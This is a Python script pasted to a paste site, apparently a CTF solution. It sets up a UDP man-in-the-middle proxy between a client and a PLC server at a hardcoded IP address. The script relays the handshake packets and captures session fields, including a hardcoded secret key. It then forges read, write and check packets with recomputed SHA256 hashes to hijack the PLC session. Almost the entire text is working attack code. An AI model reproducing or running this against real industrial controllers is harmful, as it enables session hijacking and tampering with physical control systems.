9PPi034W

· 6 years ago · Oct 11, 2019, 01:42 PM
1import socket
2import sys
3import hashlib
4from pwn import *
5
6# Create a UDP socket
7sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
8
9server_addr = ("176.31.135.50", 20001)
10
11# Bind the socket to the port
12proxy_addr = ('', 20001)
13print('starting up on {} port {}'.format(*proxy_addr))
14sock.bind(proxy_addr)
15
16Byte_MIN_VALUE = 0
17SECRET_KEY = [
18                        -62, 75, -120, -69, 35, 105, 11, -108, 4, -39, -98, -121, 11, 
19                        91, Byte_MIN_VALUE, 110, -31, -84, -120, 107, 112, 121, -59, 
20                        -28, -42, 118, -48, 48, 11, 120, -41, 120, -24, -24, -52, -67, 
21                        -122, -39, -17, -17, 84, -101, 52, -110, -30, 116, -36, 75, 69,
22                        63, -22, 22, 119, 35, -13, -91, 112, 112, 48, 66, 89, 115, -72, 59
23                    ]
24
25def print_section_del():
26    print("-----------------------------------------------------------\n-----------------------------------------------------------")
27
28def send_data(log, data, address):
29    print(log)
30    sock.sendto(data, address)
31
32
33def recv_data(log, len=None):
34    print(log)
35    data, address = sock.recvfrom(len if len != None else 4096)
36    return data, address
37
38def forward_heartbeat(server_addr):
39    print_section_del()
40    data = b''
41    while data != b'\x00\x00':
42        data, client_addr = recv_data("Waiting to receive client heartbeat request.", 2)
43
44    send_data("Forwarding heartbeat to server.", data, server_addr)
45    data, server_addr = recv_data("Wainting server heartbeat response.")
46    send_data("Forwarding heartbeat response to client.", data, client_addr)
47
48"""
49                (1 + plc_id)    SHA256      paramArrayOfByte.length
50    Header len = 9 +            32 +        1 +                         paramArrayOfByte.length + secret_key.length
51
52    Header :
53    1
54    8-7 byte plc_id
55    Hmac([0, 1, 0, 24]) Hmac(paramArrayOfByte)
56    Index 41 = 4 (paramArrayOfByte.length)
57    secret_key
58"""
59
60def read_header(data, verbose=False):
61    secret_key_len = len(SECRET_KEY)
62    ok = data[0]
63    plc_id_bytes = data[1:9]
64    if verbose:
65        print("PlC bytes : {}".format(plc_id_bytes))
66    sha256 = data[9:41]
67    sha256 = sha256.hex()
68    if verbose:
69        print("Sha256 = {}".format(sha256))
70    param_len = data[41]
71    if verbose:
72        print("Lenght of param : {}".format(param_len))
73    paramArrayOfByte_data = data[42:42+param_len]
74    if verbose:
75        print("Param data : {}".format(paramArrayOfByte_data))
76    secret_key = data[42+param_len:42+param_len+secret_key_len+1]
77    if verbose:
78        print("Secret key : {}".format(secret_key))
79    return bytes([ok]), plc_id_bytes, sha256.encode(), bytes([param_len]), paramArrayOfByte_data, secret_key
80
81def forward_plc_name(server_addr):
82    print_section_del()
83    data, client_addr = recv_data("Wainting client plc_name request.")
84    ok, plc_id_bytes, sha256, param_len, paramArrayOfByte_data, secret_key = read_header(data)
85    send_data("Forwarding client plc_name request to server.", data, server_addr)
86    data, server_addr = recv_data("Wainting server plc_name response.")
87    send_data("Forwarding server plc_name response to client.", data, client_addr)
88
89def forward_check1(server_addr):
90    print_section_del()
91    data, client_addr = recv_data("Wainting client check1.")
92    ok, plc_id_bytes, sha256, param_len, paramArrayOfByte_data, secret_key = read_header(data, verbose=True)
93    send_data("Forwarding client check1 to server.", data, server_addr)
94    data, server_addr = recv_data("Wainting server check1 response.")
95    print("Server reponse : {}".format(data))
96    send_data("Forwarding server response to check1 to client.", data, client_addr)
97    return data[45]
98
99def forward_check2(server_addr):
100    print_section_del()
101    data, client_addr = recv_data("Wainting client check2.")
102    ok, plc_id_bytes, sha256, param_len, paramArrayOfByte_data, secret_key = read_header(data, verbose=True)
103    send_data("Forwarding client check1 to server.", data, server_addr)
104    data, server_addr = recv_data("Wainting server check1 response.")
105    print("Server reponse : {}".format(data))
106    send_data("Forwarding server response to check1 to client.", data, client_addr)
107    return data[45]
108
109def forward_check3(server_addr):
110    print_section_del()
111    data, client_addr = recv_data("Wainting client check3.")
112    ok, plc_id_bytes, sha256, param_len, paramArrayOfByte_data, secret_key = read_header(data, verbose=False)
113    send_data("Forwarding client check3 to server.", data, server_addr)
114    data, server_addr = recv_data("Wainting server check3 response.")
115    print("Server reponse : {}".format(data))
116    send_data("Forwarding server response to check3 to client.", data, client_addr)
117    return {'ok':ok, 'plc_id_bytes':plc_id_bytes, 'sha256':sha256, 'param_len':param_len, 'paramArrayOfByte_data':paramArrayOfByte_data, 'secret_key':secret_key }
118
119
120def read_data(server_addr, normal_data, off, l):
121    print_section_del()
122    print("Reading data")
123    paramArrayOfByte_data = b'\x00\x01' + bytes([off]) + bytes([l])
124    param_len = bytes([len(paramArrayOfByte_data)])
125    sha256 = sha256func(paramArrayOfByte_data)
126    data = normal_data["ok"] + normal_data["plc_id_bytes"] + sha256 + param_len + paramArrayOfByte_data + normal_data["secret_key"]
127    send_data("Sending read request to server.", data, server_addr)
128    data, server_addr = recv_data("Wainting server response to read.")
129    print("Data readed : {}".format(data))
130
131
132def write_data(server_addr, normal_data, off, data_to_write):
133    print_section_del()
134    print("Writing data")
135    paramArrayOfByte_data = b'\x00\x02' + bytes([off]) + bytes([len(data_to_write)]) + data_to_write
136    param_len = bytes([len(paramArrayOfByte_data)])
137    sha256 = sha256func(paramArrayOfByte_data)
138    data = normal_data["ok"] + normal_data["plc_id_bytes"] + sha256 + param_len + paramArrayOfByte_data + normal_data["secret_key"]
139    send_data("Sending write request to server.", data, server_addr)
140    data, server_addr = recv_data("Wainting server response to write.")
141
142def resp_get_plc_name():
143    print_section_del()
144    address, plc_id_bytes, sha256, param_len, paramArrayOfByte_data, secret_key = read_header()
145    send_data("Sending data for get plc name", b'A' * 45 + b'\x0a' + b'B' * 10, address)
146
147
148def sha256func(data):
149    m = hashlib.sha256()
150    m.update(data)
151    return m.digest()
152
153def simCheck(server_addr, normal_data, checkId):
154    print_section_del()
155    print("Simulate check {}".format(checkId))
156    paramArrayOfByte_data = b'\x00\x03' + bytes([checkId])
157    param_len = bytes([len(paramArrayOfByte_data)])
158    sha256 = sha256func(paramArrayOfByte_data)
159    data = normal_data["ok"] + normal_data["plc_id_bytes"] + sha256 + param_len + paramArrayOfByte_data + normal_data["secret_key"]
160    send_data("Sending fake check to server.", data, server_addr)
161    data, server_addr = recv_data("Wainting server response to fake check1.")
162    print("Server repsonse readed : {}".format(data))
163    return data
164
165forward_heartbeat(server_addr)
166forward_plc_name(server_addr)
167forward_check1(server_addr)
168forward_check2(server_addr)
169normal_data = forward_check3(server_addr)
170
171
172while True:
173    # write_data(server_addr, normal_data, 0, b'A'*60)
174    read_data(server_addr, normal_data, 0, 50)
175
176    forward_heartbeat(server_addr)
177    forward_plc_name(server_addr)
178    forward_check1(server_addr)
179    forward_check2(server_addr)
180    normal_data = forward_check3(server_addr)